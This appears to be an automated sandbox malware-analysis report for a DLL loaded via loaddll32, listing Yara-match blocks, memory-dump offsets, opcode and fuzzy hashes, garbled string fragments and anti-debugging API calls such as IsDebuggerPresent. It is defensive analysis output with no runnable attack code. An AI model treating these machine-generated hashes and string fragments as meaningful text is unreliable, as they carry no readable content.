                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: "E)$Ti$X($vtc$|$~Mj
                                                                                                                                                                                      • API String ID: 0-2927301414
                                                                                                                                                                                      • Opcode ID: 3d8ec008e6dc49c306694b80d1cb3fa0644b027db4ae6c0dfe7877f2034c749e
                                                                                                                                                                                      • Instruction ID: 98642295e13437764011fd5a6402604bc26ea4f9c2051b798d472c25b1c39bf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d8ec008e6dc49c306694b80d1cb3fa0644b027db4ae6c0dfe7877f2034c749e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CC143728083819FD758CF66C58990BFBF2BBC4758F108A1DF59A962A0D3B58909CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: (TO$0;$8z$8z$His$~a
                                                                                                                                                                                      • API String ID: 0-2714135093
                                                                                                                                                                                      • Opcode ID: df3878934ae7ed5ea030270df1f8f08988b6eeb6046ee7f2e8ef2026ca98c2c6
                                                                                                                                                                                      • Instruction ID: 03eb1fade9d4bc22564b4e9df1234849f1d756ec31890990d83400b74d0917b7
                                                                                                                                                                                      • Opcode Fuzzy Hash: df3878934ae7ed5ea030270df1f8f08988b6eeb6046ee7f2e8ef2026ca98c2c6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61C141724087849FC769CF66C88991BBBE1FBD4748F408A1DF296862A0D7B5C948CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: )$E5$Ht|$I+C$\a$i_Z
                                                                                                                                                                                      • API String ID: 0-3197448685
                                                                                                                                                                                      • Opcode ID: dc7ec5f87f9addec28fada5d7b7ba0d725f1080c69ad834d5691fdc44e7a2c3a
                                                                                                                                                                                      • Instruction ID: 92c1984ae9ee2b8942a3fc2a53154f9be5a38047f95c6c5208b65d3f5b590716
                                                                                                                                                                                      • Opcode Fuzzy Hash: dc7ec5f87f9addec28fada5d7b7ba0d725f1080c69ad834d5691fdc44e7a2c3a
                                                                                                                                                                                      • Instruction Fuzzy Hash: EAB132B24083419FC359CF65E58941BFBF1BBC4758F10492DF695A6260D3B18A49CF87
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: &?$*ZV$,S$HU;$YY$l]
                                                                                                                                                                                      • API String ID: 0-166477480
                                                                                                                                                                                      • Opcode ID: 8379d690d42ec0717b2dc05813671df429d046ea21c66b5b0be9c591ecf28804
                                                                                                                                                                                      • Instruction ID: 7948e1387686efd8a514864d333a27fac7aa353f9bb3bdb2e8af4bad85f26340
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8379d690d42ec0717b2dc05813671df429d046ea21c66b5b0be9c591ecf28804
                                                                                                                                                                                      • Instruction Fuzzy Hash: E4B121719093819FC365CF2AC18580FFBE1BBD4758F108A2DF5959A264D3B1CA49CF82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: K}$L *$`w$t&$tV$p
                                                                                                                                                                                      • API String ID: 0-1343311438
                                                                                                                                                                                      • Opcode ID: f1fedb391b1be0cfeab6abe318c614e3f470824f58718c5b660ab5de92dde386
                                                                                                                                                                                      • Instruction ID: 6b10c9a317f1f4a7b04fc70058237f27047b28155c2458ae53f009938726c01e
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1fedb391b1be0cfeab6abe318c614e3f470824f58718c5b660ab5de92dde386
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DA150B2808381AFD359CF25E48A40BFBE1FB84758F005A1EF19596260D7B5D908CF83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: '%,$6"-$9,|$?)U8$T5($hEG
                                                                                                                                                                                      • API String ID: 0-3268558942
                                                                                                                                                                                      • Opcode ID: 97228ab59ed9630f98e9f0e5e78fbbfcc72a5cdc37ae4c889db6885b95efb7da
                                                                                                                                                                                      • Instruction ID: 527adc92a62d504d7180815112c1815ace4532abf56be9b3d4064f969fbd5edf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 97228ab59ed9630f98e9f0e5e78fbbfcc72a5cdc37ae4c889db6885b95efb7da
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BA10FB5D0121CEBCF08DFE5D98A8DEBBB2FB48304F20815AE416BA250D7B51A49CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -^$AV$fHB$l/$tLo$r
                                                                                                                                                                                      • API String ID: 0-2229134097
                                                                                                                                                                                      • Opcode ID: 2569817d2556f0b60cb2ea9d8897c8efc9559523cbda283caf4cba7b1cabb72c
                                                                                                                                                                                      • Instruction ID: 6810fc1a69588c8717e1a200786306b0a6ac94497d07deed442ea554daf171f6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2569817d2556f0b60cb2ea9d8897c8efc9559523cbda283caf4cba7b1cabb72c
                                                                                                                                                                                      • Instruction Fuzzy Hash: E27142711083809FC359DF65C58A41BFBF5FBC4748F509A2DF29A962A0C3B58A48CF82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ;$ED:$G~s$ge$y
                                                                                                                                                                                      • API String ID: 0-4105283278
                                                                                                                                                                                      • Opcode ID: 6238e9735ae5bf82ec57977a8b8199991a1af9bdee807884c292077f9171ac94
                                                                                                                                                                                      • Instruction ID: 6edfe99166d4358bccc66525eec1f3c073089e53402a1de972b4d3add08e3826
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6238e9735ae5bf82ec57977a8b8199991a1af9bdee807884c292077f9171ac94
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E101B15093809FC368CF26D98A61BFBE2FBC5708F508A0DF59996260D7B58949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: "$>/f$I$ln$oNL
                                                                                                                                                                                      • API String ID: 0-652186313
                                                                                                                                                                                      • Opcode ID: 91737380f87d3013d36d94f269d3b99117214f3abac748228f9e893ad40f6c34
                                                                                                                                                                                      • Instruction ID: 91067a35c8fa8f4d1dcc4f43007f250135251c7e560916bfec1fa1301212e182
                                                                                                                                                                                      • Opcode Fuzzy Hash: 91737380f87d3013d36d94f269d3b99117214f3abac748228f9e893ad40f6c34
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EC15FB10183818FC359CF65D58545BFBE1BBD9708F108A0EF19A96260D3B8DA4ACF86
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: (j]$,d$WQ$W$]t
                                                                                                                                                                                      • API String ID: 0-3511903769
                                                                                                                                                                                      • Opcode ID: 758f376c0b5cf977697d4601bd28f049142a3b390b8ffaa063cc1da876cfa993
                                                                                                                                                                                      • Instruction ID: 2024ee069f7a03dfcd0d521743bf2f3b6c80e93658d1703656b5173c44958748
                                                                                                                                                                                      • Opcode Fuzzy Hash: 758f376c0b5cf977697d4601bd28f049142a3b390b8ffaa063cc1da876cfa993
                                                                                                                                                                                      • Instruction Fuzzy Hash: 66A131711087809FC359CF26D48A81FBBE1FBC4758F604A1DF6969A261C3B58A49CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: &"$S3$Y1$y@ko$1
                                                                                                                                                                                      • API String ID: 0-1237345320
                                                                                                                                                                                      • Opcode ID: 9c0ee166a0d573da2383d4e941f13942f6eb3f52a2fce6c77f87b5e0c06da37b
                                                                                                                                                                                      • Instruction ID: 7b094a99d2db6a4e00cce002b9c1573d18042a7be91f7120f3d7be8054f916cd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c0ee166a0d573da2383d4e941f13942f6eb3f52a2fce6c77f87b5e0c06da37b
                                                                                                                                                                                      • Instruction Fuzzy Hash: E2A174721093419FC359DF61D58982BFBE2FBD8708F40891EF2969A260D3B1DA098F43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: GDK$Smq$XU~$`H*$~V
                                                                                                                                                                                      • API String ID: 0-3650479097
                                                                                                                                                                                      • Opcode ID: c567ba80173c02312879da60463322da737f8d1bc8f9a2772910c3847abd660a
                                                                                                                                                                                      • Instruction ID: 75b5f2dde2dd824ce50b4057dafc6cd8510753751ebc68443549aac86e361bb8
                                                                                                                                                                                      • Opcode Fuzzy Hash: c567ba80173c02312879da60463322da737f8d1bc8f9a2772910c3847abd660a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 49A1F17250024CEBDF59CFA5D94A9CE3BA1FF48358F108119FE2996260D3B6C959CF80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: (1p$5EV~$FnE$u'd$2l
                                                                                                                                                                                      • API String ID: 0-2267264843
                                                                                                                                                                                      • Opcode ID: c50a1f6191cad3723e79060ec10ff710eec2592c7ea75bcfd4f6a59e8a680903
                                                                                                                                                                                      • Instruction ID: eaa64a712ac9e4301fc428825577e5ebb4154da01db76b3936f28b32c04b8377
                                                                                                                                                                                      • Opcode Fuzzy Hash: c50a1f6191cad3723e79060ec10ff710eec2592c7ea75bcfd4f6a59e8a680903
                                                                                                                                                                                      • Instruction Fuzzy Hash: 799143725083819BC359CF65D88A41BFBE2FB84758F104A1DF18596260D7B5D958CB83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E9ED1D8
                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6E9ED2A4
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E9ED2C4
                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6E9ED2CE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                      • Opcode ID: ef6ec04a1adafa7eb86a3a799db27b78bcdc3c4a6bfcb2043d0d46c3f6a4da9d
                                                                                                                                                                                      • Instruction ID: 79b619be8b24a144da45d6cff490ab8276dfce5fa48f88002506c7957b8b6c15
                                                                                                                                                                                      • Opcode Fuzzy Hash: ef6ec04a1adafa7eb86a3a799db27b78bcdc3c4a6bfcb2043d0d46c3f6a4da9d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A3116B5D052189BDF12DFA4D989BCCBBB8AF48304F1044AAE50DAB240EB719A85CF44
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: =Lw$=t[$A{$g,0
                                                                                                                                                                                      • API String ID: 0-3102551745
                                                                                                                                                                                      • Opcode ID: b5cfa27c232066c8a91d41ead051fe897431db125aa753e95c48210418e758b9
                                                                                                                                                                                      • Instruction ID: a66dceea0c6b4a9c078084b4e74b733d9d5a06c54701cf90e9305ee15927e8f1
                                                                                                                                                                                      • Opcode Fuzzy Hash: b5cfa27c232066c8a91d41ead051fe897431db125aa753e95c48210418e758b9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 121202715083809FD365CF65C58AA9BFBE2FBC4758F108A1DF29986260D7B48949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: +M$.*&$Y\T$u_T
                                                                                                                                                                                      • API String ID: 0-2652214267
                                                                                                                                                                                      • Opcode ID: 62cb3202297b267fcb5cf2af4a2df7b51c2065a9d916ec038e3141b838af2f90
                                                                                                                                                                                      • Instruction ID: 81ebaddd515983ef57991d43ed38d2206d2c0013f24642b871a2eb231d11ff1c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 62cb3202297b267fcb5cf2af4a2df7b51c2065a9d916ec038e3141b838af2f90
                                                                                                                                                                                      • Instruction Fuzzy Hash: D4B143B6D10319EBCB55CFE5C98A6DEBBB1FF04314F208149E112BA2A0D3B41A49CF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: AZk$C)/$Q5$(P
                                                                                                                                                                                      • API String ID: 0-3568429903
                                                                                                                                                                                      • Opcode ID: 4f5247ff58d37919dde0014091b0176d3b6085f5b95e0dacd0acd0109bc31bfc
                                                                                                                                                                                      • Instruction ID: 0c79ebdf0de6106833c21a664556c937c0902b5c0da6582b75da4da669fdcff1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5247ff58d37919dde0014091b0176d3b6085f5b95e0dacd0acd0109bc31bfc
                                                                                                                                                                                      • Instruction Fuzzy Hash: E69111B2508380AFC359CF69C98690BFBF2BBC4714F409A1DF5959A260D7BAD905CF06
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Ge&$VXe$bQ$q;\
                                                                                                                                                                                      • API String ID: 0-2640374020
                                                                                                                                                                                      • Opcode ID: cc2a5a54575fbf300a3aebb8dccb6ac4b5d29b68b9b0ac915b38ada48fa4d047
                                                                                                                                                                                      • Instruction ID: 5813ccc563f1ff413cc2a2b2ff91941ffd05309d2104e48f9af4ee517282b9b9
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2a5a54575fbf300a3aebb8dccb6ac4b5d29b68b9b0ac915b38ada48fa4d047
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68616271508341AFC799DF21C88A41BBBE1FBC4348F104A1DF59AA62A0D771CA49CB82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ,\H$,\H$af`$c2O
                                                                                                                                                                                      • API String ID: 0-3082886527
                                                                                                                                                                                      • Opcode ID: 3bfb5e42cca4a70539c8f4188a6d54e0a7ec739cabc5743c37cdc03544baeb09
                                                                                                                                                                                      • Instruction ID: c12005291d4c7ae8f92bf19422b85dbb5ad0aa1be3e1fc141b7625814ac4db5b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bfb5e42cca4a70539c8f4188a6d54e0a7ec739cabc5743c37cdc03544baeb09
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A5196726083419BC759CF29E58941FBBE1FBD8758F204A1EF196A62A0C370CA09CB57
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %uG$4`g$g6$!#
                                                                                                                                                                                      • API String ID: 0-3570404244
                                                                                                                                                                                      • Opcode ID: 49efdd2581645fbbb63b707176fab2ea5744dfb9c626b487036a607583eb4737
                                                                                                                                                                                      • Instruction ID: 8b6ae4992a529acf625eabde906404a1be8f2eb5bf86faf60b689c16caeeb414
                                                                                                                                                                                      • Opcode Fuzzy Hash: 49efdd2581645fbbb63b707176fab2ea5744dfb9c626b487036a607583eb4737
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B5112B1C0121EEBCF15CFA4D94A8EEFBB4BB44718F208199C521BA250D3B41A49CFA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: zL$("$9b'$q
                                                                                                                                                                                      • API String ID: 0-871342943
                                                                                                                                                                                      • Opcode ID: d58202ca7df7bc05c79e8fbda96cdac0ffd23f09c47f9b8b024468306da2de10
                                                                                                                                                                                      • Instruction ID: e25cd9ed624f3e6b4cb669d898c757d5278d9d2ca296d1336092ad7fde7ae05a
                                                                                                                                                                                      • Opcode Fuzzy Hash: d58202ca7df7bc05c79e8fbda96cdac0ffd23f09c47f9b8b024468306da2de10
                                                                                                                                                                                      • Instruction Fuzzy Hash: 814146B25083419FC394CF21D58940BBBE5FBD8718F505A1EF499A6264D7B4DA0ACF83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E9F2ADE
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9F2AE8
                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E9F2AF5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                      • Opcode ID: 170644f5fbd8dbe93e873b260ce315fdda6ba3628b3b9e2668c5167741459444
                                                                                                                                                                                      • Instruction ID: 99fa581520ea505a2d03a7282e256c7947abe77294d8a0eb87d8fbea69f0bd2d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 170644f5fbd8dbe93e873b260ce315fdda6ba3628b3b9e2668c5167741459444
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4931C274901228ABCB61DF64D988BCCBBB8BF58310F5045EAE81DA7250E7709F858F44
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $"pRk$)dP
                                                                                                                                                                                      • API String ID: 0-4184037624
                                                                                                                                                                                      • Opcode ID: 6ac0fe42bcd2ce2da81b2a65f90b84b19e729091e40ced8172263e78d30f7bb4
                                                                                                                                                                                      • Instruction ID: 839bd03484a14ec0823c16ac2b5e8745c39a46f9859d0cf70b218a067fa509a7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ac0fe42bcd2ce2da81b2a65f90b84b19e729091e40ced8172263e78d30f7bb4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 082231715093808FD369CF26C58AA9BFBE1FBC4708F50891DE6DA86260D7B19949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
